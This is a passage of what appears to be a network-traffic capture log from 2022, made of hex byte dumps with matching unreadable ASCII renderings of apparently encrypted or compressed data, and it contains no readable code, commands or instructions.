3e e2 47 ee 94 61 a6 31 77 7f 9e b3 34 54 d2 6f 7f cb 25 94 83 79 d3 61 22 42 1e ae d8 77 21 84 71 04 c4 39 e9 bc 3d
                                  Data Ascii: 0iXZn>-e*Rahmvo/Zx6<.}pbE3bG[`c_j4.+fZ{. ^-EvvRRi+"R?Fgv?PS)UIUb]bD(iQu^>Ga1w4To%ya"Bw!q9=
                                  2022-11-29 15:55:23 UTC1553INData Raw: b4 5e 89 06 1a fa a5 51 38 5d c9 69 a0 d4 1d f9 c3 b4 2a 06 21 06 ee 3c 07 5b 22 07 9a 8d 7b 30 54 cb cb 86 fe 7f 03 c9 a5 26 7b 82 f1 f6 df 79 67 f6 05 da 4a 48 89 32 22 a0 f1 ea db 6b e8 a4 ce b7 60 96 b1 df 51 f5 c3 2b cb 55 b6 b5 80 e6 be b8 df a3 d8 d2 ce fd 44 46 8d f8 9b 4b 61 03 e7 3d 13 93 2b a0 89 89 30 f7 d5 22 ad d8 cb af fc 71 c6 7c d7 dc b0 79 d3 9e 78 bb a5 53 bd 88 3d 9d 72 1e c3 9a 64 fb 10 d0 ef 0b 07 ac c7 82 60 62 1e 70 dc c3 3a 96 4c b4 84 94 06 01 d3 c3 e7 a8 17 25 45 11 f5 9b 00 90 2b 69 3c d5 b3 60 85 66 32 bf dc a8 f7 f1 06 0e 52 63 de a7 3f 2a 86 6c b5 44 66 69 74 bb 46 5f 91 ab 97 e4 13 a6 95 95 fe ab 6e c8 01 1c d4 ad b9 57 38 6b fd 5a 3f e2 56 9a b9 65 5d 50 f4 26 18 96 2d d2 d3 47 df ea 66 fc d5 4b 05 44 3b 9b 33 24 b2 de 7a
                                  Data Ascii: ^Q8]i*!<["{0T&{ygJH2"k`Q+UDFKa=+0"q|yxS=rd`bp:L%E+i<`f2Rc?*lDfitF_nW8kZ?Ve]P&-GfKD;3$z
                                  2022-11-29 15:55:23 UTC1569INData Raw: e6 be 6d e4 17 89 29 4a cd b0 02 26 ab 84 15 ad b4 ba 7d 4d 57 3e b7 01 fb 8c a1 68 b2 66 54 42 9d 01 3b 63 13 32 fb 6d e0 49 d7 06 70 1c f5 d5 d5 62 c8 f5 bb 35 6a 3d 00 d4 49 e0 28 66 c9 3d 0f 60 05 de a7 44 30 f4 2e cf a8 79 e2 2f c9 32 48 f5 fb 20 4a 75 ce 19 91 30 8b 85 07 1d 44 f0 ad 76 9d 0c 75 31 93 48 9a fe 73 58 3f bf e0 d2 fc b7 62 5c c7 30 fa 6c 98 f8 0a 0a 20 76 ec 92 46 18 f8 85 69 22 82 35 ac 30 38 ec 77 0b bd 4c 68 2b 16 a2 54 34 4f be 4d 25 46 53 a4 ea f7 c6 b0 69 e8 46 05 46 0b b3 40 36 bd 66 fd 5e 49 5b 60 38 a0 9f c4 27 5b cf 0d e4 00 59 e5 7f 1f 2a d1 94 71 26 cc 68 82 15 34 ff 29 42 1c 19 e1 3a 66 45 8a b3 2e de 12 08 35 18 5f c9 1d fd 14 21 b7 19 de cd 4a 0d 5f 03 95 78 79 b7 55 11 be ab 04 e9 58 35 94 42 01 fd bf b0 fe 41 9d 4f c1
                                  Data Ascii: m)J&}MW>hfTB;c2mIpb5j=I(f=`D0.y/2H Ju0Dvu1HsX?b\0l vFi"508wLh+T4OM%FSiFF@6f^I[`8'[Y*q&h4)B:fE.5_!J_xyUX5BAO
                                  2022-11-29 15:55:23 UTC1585INData Raw: c9 9f 5f aa f3 fe 6f 84 1a f9 49 8a 86 53 77 94 d3 9c 17 cb 57 b5 ee cb 03 94 f4 d7 ca 30 02 8f ab 5f cc aa cb 25 b4 3c 90 c8 df 6a 3d dc 67 33 b9 e0 26 8a 7c 9b 5a 85 47 59 8f 09 1b f4 5b 84 1e 4b 43 e4 c5 b5 de b4 fa 82 dd cb 6d dd 1a 21 f8 dc f2 df b1 6d c2 ca 11 43 4f ff 64 5e 8f 84 09 92 98 21 4b 0e 58 49 84 9a 9d 37 a0 d9 44 b1 2d bc 5e a9 ba c3 e3 52 5d 2e 78 37 ef ed 78 f4 ec 4f 3c 05 9d 96 fd 81 73 31 ba ff fc 7f 28 e2 02 a9 7c e4 c9 cd 46 c7 ae 64 dd 7f 79 9f 19 c1 96 19 3f 38 61 29 01 20 53 9e e0 cd 03 2e c5 42 f3 d2 83 11 36 96 f2 a5 91 5b e5 04 5d 7a 7e bc 05 6d 0a 71 2c 33 49 ba 57 14 a7 7b 48 68 eb ad 0a bc cf d0 84 97 b2 dc a1 0a 77 92 a0 8c d5 b7 36 47 ac a5 51 2e 96 ef 6e d4 57 cc 0a 8d 7b db 7a c6 a5 9c 2b 26 40 bc 1b 89 cf 77 46 de c6
                                  Data Ascii: _oISwW0_%<j=g3&|ZGY[KCm!mCOd^!KXI7D-^R].x7xO<s1(|Fdy?8a) S.B6[]z~mq,3IW{Hhw6GQ.nW{z+&@wF
                                  2022-11-29 15:55:23 UTC1601INData Raw: 60 05 76 5c 8d 25 72 94 23 7c d1 9f 5e 28 25 c3 6d d3 68 1c a2 3a 5a 6b 9c 53 8a ee ff 7d 9c 40 ff 4c 0c 72 ad ab e3 af 92 ea 21 ee 4b 7d f1 97 3f 9e fd 56 e0 bb 33 32 0f a4 d5 dd c7 25 76 62 b5 ca af 81 5a 6e 29 29 13 ee 68 07 47 7a ca 02 1a ca a7 ff 20 48 f1 c9 0d f4 3a 43 cd 8f d1 01 24 40 53 f8 50 d7 89 cb bf a8 9d e6 5e 52 a3 07 7b 92 8e 9c 69 e1 31 60 51 d9 7c e4 ac 55 8a 94 9b dc 0c d8 47 99 30 e8 74 70 16 fd 42 7b 3b a2 fb 33 5f 29 0e 74 be 88 83 b9 e4 07 a2 1e e8 dc d2 f5 17 50 f1 39 72 80 8a 1d e3 d4 70 32 37 a0 32 17 ea 6e a5 5f 2b 6f b8 dd 44 96 4a 4d 3e d9 00 b3 ca 05 03 be f9 d7 25 53 a6 ee 98 aa c9 54 ba 12 fe b1 5f b5 cf 53 04 b5 54 a7 04 9c 71 e6 c3 e4 38 fc 67 58 96 1c f5 1a a6 14 03 2f 2f 00 00 80 78 aa 9c c8 55 43 c9 ee 3d 8c d7 4a 97
                                  Data Ascii: `v\%r#|^(%mh:ZkS}@Lr!K}?V32%vbZn))hGz H:C$@SP^R{i1`Q|UG0tpB{;3_)tP9rp272n_+oDJM>%ST_STq8gX//xUC=J
                                  2022-11-29 15:55:23 UTC1617INData Raw: 02 bf 97 9a 85 f0 91 32 8f e3 d9 5a b7 6c 11 85 ba 05 60 c9 29 13 57 c5 bd 47 af 66 11 17 94 4d aa fa 2a bc fe 5d 58 1a db 95 0e 67 06 c1 60 8a f5 69 a1 b7 49 c0 f2 b2 18 57 d4 51 cf 4c 68 67 3d 93 70 37 ab 32 8b 06 ca f8 36 78 56 97 6f df 7c af a0 29 4b f4 e9 26 0a 3d ba 76 cc 44 87 b2 b4 00 e6 1e 54 42 bb ff ba 32 4f 1d 43 17 a9 c7 cc 15 65 1b 40 a2 b4 d3 77 6e 68 fd 4b f4 9e 17 17 06 a8 83 35 cf 86 24 31 91 83 ab 1b e2 d2 9f 34 62 53 4e 78 60 3c 76 5a 18 5b 67 28 9f 3a c5 aa 39 d8 64 e5 a0 d3 01 55 b0 1a a3 59 91 b3 cd de a3 ad a1 c4 f2 9d 3a 59 1c c1 e1 3f 25 43 e2 7c 6d 23 ed 96 cf 89 5d 59 6d 7b 34 8a b4 c6 b1 29 19 05 96 5c cc 29 2f f5 36 ac ea 9f 79 4e c0 66 19 06 83 65 ba 79 ba 13 3f fb 52 6b 01 74 2d 98 a7 7a 14 e9 cb 07 a8 86 15 bf 74 c9 40 16
                                  Data Ascii: 2Zl`)WGfM*]Xg`iIWQLhg=p726xVo|)K&=vDTB2OCe@wnhK5$14bSNx`<vZ[g(:9dUY:Y?%C|m#]Ym{4)\)/6yNfey?Rkt-zt@
                                  2022-11-29 15:55:23 UTC1633INData Raw: 21 94 f2 76 be f9 17 26 4d ea ee 5c 8a 88 57 bc 14 36 92 db a0 48 a3 a8 7a 48 bb 62 5f 93 03 fe ef 64 c2 2c ce c8 49 4b 1b 0a 0f 2c 72 d5 9e 67 85 41 20 79 b4 8f 6a 91 7c f2 be 76 04 97 d5 74 ad 70 fa bd d6 8a 7d 42 45 56 3f 3f 1c c2 39 04 68 b7 aa 10 9d 11 25 4c f7 ad f2 94 58 08 16 67 2b 7f b1 8e f5 f5 78 de e7 3f ae d9 7d 9d a5 4d d1 3d 8b 13 6e 76 da 31 1e 12 c0 a3 dc ed 93 ec 90 0a 13 dc 18 5a 8a ce d4 a1 67 e7 ab b5 78 a1 cd e6 bc 99 14 c0 4b 08 db 51 aa 17 11 57 ef 2c 4a 48 38 e8 ac 6a 8f 00 11 c4 df 42 21 42 57 62 e0 98 92 9b e6 4e 73 78 13 09 3a 38 91 4f 7d 9a fd 05 1d c5 20 5b a2 ae 8b 4a 20 d8 af fc 30 7d 3a d0 8b d1 d7 5f d3 58 1b 40 60 39 a9 ad d7 2d 79 bd 29 2a db 0e f2 7b 06 89 1d af cd 69 0c 09 eb 28 93 35 4b 81 cd 86 5b 3f b3 34 86 2d bc
                                  Data Ascii: !v&M\W6HzHb_d,IK,rgA yj|vtp}BEV??9h%LXg+x?}M=nv1ZgxKQW,JH8jB!BWbNsx:8O} [J 0}:_X@`9-y)*{i(5K[?4-
                                  2022-11-29 15:55:23 UTC1649INData Raw: f8 e7 bd 73 4c 86 83 87 3a 56 f2 ec 1e d6 56 69 bc f6 20 69 aa bb 04 31 17 fc 93 50 ba c3 5c af 83 37 e9 44 d6 12 19 9f 53 fc 47 4c 67 2b 6b 54 e4 9c 0b 2c e1 65 4f 48 39 e5 5a 4d 7c 6f 34 ef a7 33 26 a9 bc 22 17 ca 4a d7 e4 ba 84 1a e5 b5 b8 45 5a 80 03 a8 96 7b 4d f1 53 e5 c1 88 ac 77 06 17 5b b7 dc 12 9b 68 d9 a1 05 58 62 25 2a 90 ce 25 56 b4 ca 7e 37 90 f0 68 88 43 56 ab 25 ab 11 de ea 79 d3 15 72 51 4a fe 8c a6 f6 84 5f b9 02 8b 09 f0 bf 89 c5 a1 e6 f8 2b af 55 e6 2d 44 f2 2b a8 b5 67 c7 fb a5 13 ff 9e 5a 7d aa 29 bf 2e 1a 6a 1c 2b e1 ce ef 71 9d 0c b9 9e eb 19 0d ab 98 1f e6 4c d5 f7 da 52 58 fc fd e7 d5 e2 eb b8 76 64 8a 37 1a fd b8 a7 fb a3 6b f9 96 29 78 bb 7d 49 3f d8 18 89 5b df 54 e7 e9 c1 99 53 7f b0 f7 fb d3 5e 46 5d ac 41 fe e2 0b 4f 27 99
                                  Data Ascii: sL:VVi i1P\7DSGLg+kT,eOH9ZM|o43&"JEZ{MSw[hXb%*%V~7hCV%yrQJ_+U-D+gZ}).j+qLRXvd7k)x}I?[TS^F]AO'
                                  2022-11-29 15:55:23 UTC1665INData Raw: ae 01 3d 47 8b 45 18 60 12 7f 0b f7 02 ed ec 79 71 ba 4f 10 cc f4 36 45 73 70 e2 e4 71 a4 20 c5 d1 05 57 aa 61 a3 86 33 b1 50 a4 6d b0 6c 18 02 cc ab b7 04 b6 52 9f b0 5d c0 69 cb 19 f8 db d8 63 6b 3e 04 e1 9f 98 0e a2 04 00 84 e0 17 a6 9f 55 14 5b 27 24 fb db 47 2c 8f 41 c8 9b 83 d7 32 0c a7 55 16 d7 60 77 d6 d7 da f7 3d ea 53 54 24 53 91 75 03 a7 54 c8 fd a5 0b 28 37 e1 a2 7b e4 ca d0 ce 8a 21 1c ef 7f b4 94 b6 09 42 43 2d d5 0e ce 0e d4 f9 77 fa 64 08 63 86 af 1a 21 5a a2 fe cc 76 d4 e5 68 31 de c0 52 8e 63 40 8f 7d c4 ca 7c 78 07 14 cb 60 cb 85 8d b9 bb ee a7 7c d3 07 94 6f da a4 73 59 f4 c8 f6 0d 3c b4 70 b0 7e c0 54 8e d7 74 bc f2 5b c9 62 d1 61 e5 d5 ee 31 e0 92 99 df b7 bf 92 8d 62 ef 19 05 1b e2 71 93 de 3a 75 40 99 63 1e 52 69 af 3d a5 9a 51 bd
                                  Data Ascii: =GE`yqO6Espq Wa3PmlR]ick>U['$G,A2U`w=ST$SuT(7{!BC-wdc!Zvh1Rc@}|x`|osY<p~Tt[ba1bq:u@cRi=Q
                                  2022-11-29 15:55:23 UTC1681INData Raw: d8 d9 d5 7e a3 85 29 a4 da 10 14 05 d5 fb c6 b1 38 ed 8e 85 bb 17 a0 b1 a7 b5 93 77 f0 70 25 e2 f3 c2 86 7f 21 5d c1 26 8e a3 7b 6d f5 9a ba e9 1b 52 ea d4 62 3d 9e c9 c3 38 d3 47 c4 6e f6 14 dd f9 f7 cf 8f 48 68 91 10 6d d2 dd 78 e3 e3 86 1b e8 08 d0 0f e7 99 46 fd 59 e7 a3 1f 6d a8 18 a9 47 c6 c0 e8 10 77 c4 e0 bc 6e 9b b4 12 c2 f2 aa 4d cb bc 2e e6 ae 6a a1 2b e1 8c 0f 3a eb b9 c4 b1 86 06 36 ea ea c1 fa b3 aa 55 81 88 3c 45 92 d1 4c d1 2d a7 64 37 99 e3 a1 e8 4a a9 7a 3f a7 0d be 5c b7 41 40 28 6c ac 4a 92 20 48 11 b0 36 b7 d3 cf 4c 30 63 48 fa d8 47 44 d2 60 9a 40 00 b2 1b fc c5 ef f2 5e 95 2d 90 e4 4e 57 6e 52 cf 91 22 59 2c c3 1c 64 70 16 85 73 ca ff 39 54 ed 6d 51 29 65 72 78 5d 2a c4 75 64 86 96 e1 40 c1 69 b8 82 03 97 a3 13 42 93 ce 0f 28 d0 3c
                                  Data Ascii: ~)8wp%!]&{mRb=8GnHhmxFYmGwnM.j+:6U<EL-d7Jz?\A@(lJ H6L0cHGD`@^-NWnR"Y,dps9TmQ)erx]*ud@iB(<
                                  2022-11-29 15:55:23 UTC1697INData Raw: d4 b5 aa 09 6d f5 c5 ca 42 b5 0b 80 6d 55 12 69 f7 bb dc 9c b2 1f 34 b4 04 bf ab 2b fe fb 7b 63 bf 5f 5e 41 c3 87 9d 86 98 48 a7 a9 b4 bc 57 4c 9f 9a b6 c2 d4 9b 8d 3b 23 2b 8f e5 87 5f 14 c6 68 d8 af 4a b3 e3 d0 b0 34 44 bb 50 03 44 8c 91 2c ba 29 1d 65 bb 45 ef dd 1c 54 4f 63 51 88 29 9e 6c 3b 25 88 43 05 14 4c de bd 49 cc ac 86 f2 fa f4 b8 05 5a 87 8f 6e ed 36 02 4f 5d 34 65 bb 49 bf b4 6c e5 55 e3 8d e6 86 69 d1 7e 5e 08 79 11 4e 2f 27 e2 25 f1 ac bd 20 34 d1 e0 b6 79 d3 00 aa 3d 8c 4e a1 a3 51 00 7c 5c c5 27 94 58 83 97 09 f6 24 c6 de 72 aa c1 74 78 5b 6f 37 ed cb 83 08 b0 2e 17 30 42 86 a8 ed 8a c9 52 dd a8 3f 74 ca 66 73 5e 8c 8b 3d 6e 07 93 46 6b 6c 6b ea a9 f0 07 7c 4b b1 a6 9f 33 b9 d2 9f a0 84 80 d7 8e 54 45 e0 54 f0 a6 9e 6b 30 b3 cf 7f da 22
                                  Data Ascii: mBmUi4+{c_^AHWL;#+_hJ4DPD,)eETOcQ)l;%CLIZn6O]4eIlUi~^yN/'% 4y=NQ|\'X$rtx[o7.0BR?tfs^=nFklk|K3TETk0"
                                  2022-11-29 15:55:23 UTC1713INData Raw: e0 9d 1b 1a b4 a1 e5 9d 22 82 fb f2 10 36 ac 6c 9b 93 cd 38 32 85 4c a9 91 60 de 2f 85 f0 b3 e8 43 7e da 3d 31 f6 62 bc 90 f5 81 31 ce 7b 79 a0 cb 19 ce e1 47 c6 fb e7 33 0f 8b ec 95 12 18 23 e0 72 15 66 cb 19 ec 59 b1 d4 c5 54 89 b4 89 dc 59 de c4 20 6a 25 fd 73 a2 a1 e4 57 eb 98 15 00 b5 0b 94 ae 12 20 85 3c 2e 1f d2 2f a8 e8 26 fc 25 a1 b0 f4 68 a7 41 c8 d3 ae 3c 1e f3 14 07 49 b3 87 74 a7 80 81 0c 26 7b 40 b9 62 55 86 8d 85 d1 a7 3f 52 3b 5c 54 01 46 56 86 19 6a 70 aa 3f 9d a9 a6 fc 79 d8 95 51 23 6b 5c 96 80 b2 81 e6 35 5d f5 b9 08 e2 6f d9 d5 1f 07 22 62 53 d8 0c cb 9c fc 78 c1 d1 a1 c6 2d 68 ed 7e 08 ba 71 06 f2 ef 1c 91 79 30 9c fe 15 51 b1 f2 03 12 28 52 5f 98 76 34 76 32 bb 18 bd 24 35 10 60 c5 6d e4 c0 b3 86 21 41 43 0d 1a 60 fb ba 57 ce 25 82
                                  Data Ascii: "6l82L`/C~=1b1{yG3#rfYTY j%sW <./&%hA<It&{@bU?R;\TFVjp?yQ#k\5]o"bSx-h~qy0Q(R_v4v2$5`m!AC`W%
                                  2022-11-29 15:55:23 UTC1729INData Raw: b5 0a d4 ec 85 47 e7 66 bf cb dd ee 55 58 ad 36 bb 15 b8 98 19 88 7a 4e 8e 09 4f 50 11 1a 41 9d 41 06 c0 1a 12 66 a0 dc ca 38 cc 95 9f f4 0a f2 9a 75 b4 72 c9 4c 58 29 36 5e 12 7e 48 4e 29 f0 f3 a1 69 e3 57 51 f2 1c 4f 47 6d d0 f2 8a 55 21 fd 47 de d9 bb fb cc 06 66 12 81 1e bf cd 60 fd 94 91 9f 5a 0a c4 22 69 d1 57 2e 82 4d aa 32 80 88 c9 26 ba 86 cb 44 b3 3d df 8a 9a 9a a1 bf 00 2d eb 81 41 22 8c ce 2a f5 d1 d6 64 a4 e9 e4 dd eb f1 73 59 2e 79 1f c1 d1 13 84 fd 49 74 ce eb 6a 68 92 0d f2 61 c2 4b bd 30 39 7f 3e 13 52 2c e0 8c 99 e8 71 a8 62 62 e5 40 84 35 ac 8a be 24 57 c6 cb 8e 82 75 19 b1 a5 2e 47 6d a7 03 b9 67 f1 69 bd 8b cc 56 5e fd dd 3e d2 25 67 29 4b e7 aa 38 d2 83 86 45 16 34 c5 7a ba 09 3a a1 ca 19 1d c2 32 e0 0e b1 75 89 e6 0c 72 12 53 a9 15
                                  Data Ascii: GfUX6zNOPAAf8urLX)6^~HN)iWQOGmU!Gf`Z"iW.M2&D=-A"*dsY.yItjhaK09>R,qbb@5$Wu.GmgiV^>%g)K8E4z:2urS
                                  2022-11-29 15:55:23 UTC1745INData Raw: 25 ca ad ed a5 9e b5 3e be 18 76 34 60 ae 9c 8a 0e 16 12 87 bd fd 0d c2 8c e1 5f 64 08 8a 53 f8 c8 05 c7 4a 94 a9 3c 35 7f 44 72 08 e0 f8 c9 2a d7 5c 95 91 37 74 8e f3 f7 59 72 e4 ac 81 b1 dd e8 b4 dc 74 19 a7 9f 5f 23 fa d7 54 9e 38 ca 65 10 53 e5 68 af e0 03 ed 0a 95 38 ce 03 ce 68 55 95 33 c7 d3 e2 4b e0 fa cd 88 b4 41 8a 8f 7b a1 7a e1 ce 47 e6 09 45 ee e0 c5 97 b8 87 15 a8 d5 8f 18 1a 6c 0d fe f9 7e 0a 99 46 29 a4 ad 8f 82 35 56 04 bb 45 ae bc 90 2a 1f 55 1a 48 23 be c5 26 33 99 d0 ff 51 c4 1b 6d 32 65 80 20 7e ba 3d 55 f7 32 2a 68 c4 87 d4 85 d9 6e 81 90 b7 d9 6e 6b 2e 47 37 eb e9 50 bd 94 be 88 1a 7c 25 98 6f 6b 39 7d 66 cd 1b b3 59 37 7a 9b 5d dd 85 52 f7 d1 20 b3 ed e2 0c 26 d6 80 ff 4a c5 95 86 ec eb 4a 50 08 35 80 d6 d7 d0 8a 65 50 3d 56 f0 f1
                                  Data Ascii: %>v4`_dSJ<5Dr*\7tYrt_#T8eSh8hU3KA{zGEl~F)5VE*UH#&3Qm2e ~=U2*hnnk.G7P|%ok9}fY7z]R &JJP5eP=V
                                  2022-11-29 15:55:23 UTC1761INData Raw: 69 f0 62 13 fe 7e 7d e4 eb 9f 79 0f b1 34 39 ea c4 16 36 0a cc ac 81 46 11 5a cd 04 28 9a 4f 46 64 78 ca df c9 42 70 b7 96 71 ae 97 f9 d2 c3 25 08 71 67 bb e5 c7 d7 25 96 0b c5 92 87 07 12 ac d7 9f d2 be f0 9c 87 05 fe 17 b0 1e 40 f0 a2 d8 87 c4 07 a7 07 cd 89 c0 ee 23 d9 60 e7 00 00 42 55 b0 9a bc e2 fc 8c 08 1a b5 f7 33 7c ca 51 91 41 38 ba 37 a8 c5 b9 d9 24 e4 b1 e7 6d 5a 28 aa 77 06 3c ed b0 e3 3b 79 94 b8 1b 3d 47 b1 c9 da f9 34 d9 3a a2 b2 3d 79 02 a3 77 4d 61 f2 a0 70 4b 03 42 81 3c 65 83 66 57 ae 44 98 28 73 7a 4b fd fc 2a e3 d4 4a 7e 7d 39 c7 33 23 f9 ea 46 d9 1b 55 00 c3 cf 05 10 0a 0e f9 04 07 c5 5b 14 ba 98 22 f5 13 fe 22 3a 6c 7e d1 fd 88 36 76 bd c3 a3 8a c4 ac 0d cf 17 74 b5 ff 2f 31 52 32 6d 7e f5 9c c1 4a 4c a0 81 a7 d7 ce ef 43 22 7d 81
                                  Data Ascii: ib~}y496FZ(OFdxBpq%qg%@#`BU3|QA87$mZ(w<;y=G4:=ywMapKB<efWD(szK*J~}93#FU["":l~6vt/1R2m~JLC"}
                                  2022-11-29 15:55:23 UTC1777INData Raw: 28 d3 2d fa a2 ba f0 76 ce 6e 4d 19 50 76 2e bd 12 9e cc f6 aa 5a 59 7f 8c b2 36 2f 08 18 af b4 14 b7 86 a9 95 15 09 02 0a 00 5a 8b 84 c1 bf 60 df 97 d7 f4 9a 75 5e 41 f1 38 ae 8b 5b b4 ae 10 f5 2d c2 31 96 3d ae f5 ca f0 20 91 69 0d a7 77 4d fc 3b 19 bd f0 3a b8 d1 bc 97 c8 3e c6 ca 57 a2 51 c6 0a 98 c7 30 5e e2 cb 29 63 50 1a 80 d1 b1 bb a7 51 77 39 aa 6f 63 b9 35 23 47 70 db f5 66 3d 45 76 97 6d d5 96 4b dc 47 f7 63 a1 64 99 0c c4 23 20 ea e2 6c fd 12 16 ea 5c 3d d0 4d 65 a2 b1 3d 4e 0c 70 2c 5c 54 90 74 d0 20 dc 99 20 c9 c9 e5 3e 30 db 47 59 f1 e2 5b 3b c0 70 69 ea 1a 49 4d db d3 ee de 2d 16 ae d3 08 c2 9c 35 ea df 31 a2 e3 f1 76 eb 64 c6 07 3f c8 96 54 73 b1 34 85 f8 7e 0d e8 13 26 2d e0 54 81 dd 8a 91 77 cb b9 68 fa 14 46 c8 79 8d b2 cd 08 49 8e 89
                                  Data Ascii: (-vnMPv.ZY6/Z`u^A8[-1= iwM;:>WQ0^)cPQw9oc5#Gpf=EvmKGcd# l\=Me=Np,\Tt >0GY[;piIM-51vd?Ts4~&-TwhFyI
                                  2022-11-29 15:55:23 UTC1793INData Raw: f4 0e 12 9b 62 f1 c9 69 1a 3f dc da 13 1e 2a 97 ff c1 42 39 2d 77 e8 ef db 56 29 d1 08 e9 f0 2d f2 2c 26 27 ed 03 60 d1 49 01 f0 80 0e 34 66 ca 4d f1 c9 72 92 92 af 23 65 39 50 a1 8a ee 73 1f 9d 42 30 d2 6f 4d 47 7c 3d 05 be 78 9e 44 57 1e 30 88 5a 0a 8e 15 0d 2c 3f 73 d5 9f 6b 4f f7 fb b0 f3 be 94 65 54 ba 8d ed 69 d7 7f a4 ca cc e2 65 d2 d7 c1 b0 a3 10 50 fb 6e 77 f6 af a0 74 99 6b 68 e5 5d f3 8c 66 84 97 65 8b fb 53 1c 67 b2 2f 09 06 80 fd 55 2f 1c 25 43 94 91 12 1e ff 05 29 48 32 a0 10 39 7c d8 87 b6 af 80 92 2f 36 6c 07 65 df 11 92 29 77 3f c4 99 be 1b 17 6d 64 c5 c8 70 8a b6 51 74 e3 e8 29 16 2b f4 79 5f 17 fe 9a 24 39 a6 81 32 1a f9 67 3c 2b a4 16 0b ae 16 9b 9f db 6f 58 05 eb 59 89 f4 cf 5f ce 23 12 b7 63 21 19 ce 08 06 32 ae af ca 34 03 59 3f 36
                                  Data Ascii: bi?*B9-wV)-,&'`I4fMr#e9PsB0oMG|=xDW0Z,?skOeTiePnwtkh]feSg/U/%C)H29|/6le)w?mdpQt)+y_$92g<+oXY_#c!24Y?6
                                  2022-11-29 15:55:23 UTC1809INData Raw: b3 d6 99 a4 af 74 0f a8 9c 0e ba cc e1 2e 11 b0 1a ce 40 57 94 32 6e dd 0d 2a 1b f4 c3 31 90 52 63 99 b4 7a d5 ac 94 e4 1c 03 66 1a bf 23 c0 3e 05 82 e1 4f 07 cb 0e 61 b7 13 32 c0 4a 5a 59 e9 8a c6 92 bb b2 ad ac 37 a0 d4 f0 60 21 99 5b e0 9c c6 f8 24 fa 6f 06 2b 18 88 43 15 62 78 1b c6 d1 8c f9 85 d4 99 fe 0d 30 ab fb 1c 48 4e 34 db 83 6c e9 be e8 f6 b0 8d 18 55 bc af 65 ed e2 8c 9a c3 8a 02 88 d3 f1 74 ee 3e 11 d7 ea 6b 2d 44 01 d1 43 80 e6 3d 1b 1f 29 d3 11 bc 62 25 66 0f f0 de eb ac c1 f2 dd b9 0a d8 77 5c fa f3 a2 5c c6 30 18 00 dd aa e1 b9 61 7a 3f 5f f4 88 98 7d 20 d2 ee dc b8 c9 18 af 5a a5 27 eb 32 d1 1c f1 95 5b 29 2f 89 c5 83 21 53 12 ef 5c 5f 0a 37 b4 ac 85 20 ff 0f 43 e4 18 7d 7b ab ef c8 43 87 5e 2d d0 db 53 36 22 0d 44 3c fe 21 0b 5d ad 3b
                                  Data Ascii: t.@W2n*1Rczf#>Oa2JZY7`![$o+Cbx0HN4lUet>k-DC=)b%fw\\0az?_} Z'2[)/!S\_7 C}{C^-S6"D<!];
                                  2022-11-29 15:55:23 UTC1825INData Raw: 22 16 cc 10 7c f5 a7 5e cf 36 c4 01 17 94 6f d5 13 e5 cc da 41 1d 4d f6 e2 a1 3c 1e ac 70 23 55 b5 63 4c 06 9a e6 d5 a8 29 5a cc df 7b 2b 3d aa 41 23 39 a3 ad 87 63 67 ca 1b 42 11 db aa a7 1a de ca dc 54 9d 55 b9 9a 68 f4 86 ac 74 1e 4c 47 2e f1 21 31 46 03 1d 91 f8 63 f6 51 7f 95 6e 02 15 6f c6 b4 44 02 1d f6 fc 77 27 8c be ab 0c b8 c0 d2 2c 81 14 1d b9 43 47 dc 0e 4b 86 76 b0 4a 1d de b4 33 25 25 dd fc 8b dd e2 3c 38 54 81 77 37 1c 33 85 9d e7 c2 6c 16 66 27 48 f9 dd 7b 04 80 6d 83 bf c6 98 9a 0f 2a 8b 3a 10 3b 77 30 a3 33 95 ea e7 43 0c ad 06 1a 22 df 1d 08 4e 12 ba 26 a1 98 e7 70 ef 23 bc 6d 87 77 b0 3d a4 14 e0 7c 6a c7 fc c6 0c ff f2 89 42 85 f1 29 9b ae 31 6f e0 14 21 a2 4b bb 4d 5a 27 9b f5 7b ee 30 0a c6 72 08 9b 0d 17 c1 f4 68 13 82 8f 8e d8 08
                                  Data Ascii: "|^6oAM<p#UcL)Z{+=A#9cgBTUhtLG.!1FcQnoDw',CGKvJ3%%<8Tw73lf'H{m*:;w03C"N&p#mw=|jB)1o!KMZ'{0rh
                                  2022-11-29 15:55:23 UTC1841INData Raw: 12 a1 5a 26 cb 93 8c e5 f2 47 e5 65 b2 a9 f2 ea 8d dd 06 b6 ef 6d cc f9 7d ee f4 b0 3b 62 24 fb cd 50 2b c4 75 06 bc 06 95 30 cd b8 5e 9c 23 68 42 46 58 6b e5 de 55 db 4a 7b 10 21 30 4c 67 a7 62 b1 19 7b 01 00 d9 55 13 cb 67 70 7b 30 4d 80 61 8c 76 b6 1f 33 60 53 c4 eb 94 5f 9c 40 db f7 d5 9d c2 39 75 f0 a5 13 3f 54 2b 51 62 ea aa 10 e8 a8 a7 40 67 8f 3b 03 9e 01 f4 4b 9d ae ae 25 ab 68 ad 8c 22 00 c3 62 4f 5b 60 54 2d 0f ae e8 5a 35 2b 19 96 dc 9d 70 f3 aa 4e 2b cf bc 53 a1 42 f3 ec fe 25 f0 c7 6a 2a 29 f3 66 98 68 a5 40 c1 18 d5 eb 02 0d 00 6a de c2 35 84 0f da 69 44 40 78 72 bd e0 21 52 51 78 b3 57 46 c2 13 1d b8 59 35 37 c7 d5 b2 06 19 fc 91 c0 df df 70 10 ab dc cc c1 25 90 48 6a 30 ec 54 27 55 cf 0e 78 0b e1 74 3a c5 49 f8 b6 25 8a 23 09 f4 ca 81 d4
                                  Data Ascii: Z&Gem};b$P+u0^#hBFXkUJ{!0Lgb{Ugp{0Mav3`S_@9u?T+Qb@g;K%h"bO[`T-Z5+pN+SB%j*)fh@j5iD@xr!RQxWFY57p%Hj0T'Uxt:I%#
                                  2022-11-29 15:55:23 UTC1857INData Raw: 3a 5a fd 1e 43 3f 9c 92 bc 95 64 a3 09 24 55 b2 00 13 dc 7b 18 99 13 8a 9b 38 80 80 a8 49 20 70 1e b5 ef d9 aa 88 69 21 3f 68 a7 52 5d 30 fb 31 39 c5 57 99 58 65 09 42 db 3b 74 a5 d6 4f b7 e5 0e 12 3a 02 f6 5e c1 9b 86 9c 42 e3 bb d4 fc 01 ab 28 3f 33 57 f3 24 1a 2c d4 df 23 02 85 58 b0 38 a3 30 5f bb c1 c8 30 70 f2 8b cd 98 63 4a 13 cd f2 02 7f c7 ff a7 0b 97 77 44 39 8e 97 0a db b5 96 e3 8e 22 4c 71 61 93 c9 08 2e 39 c9 42 6e af 6b 53 87 89 9c d8 bf eb 76 4b ba 51 d8 59 64 ec e2 cd 15 aa 2a 92 1a 4c 9e 66 a4 8a f6 62 4d 2c e9 e2 2d 1c ec 20 5d 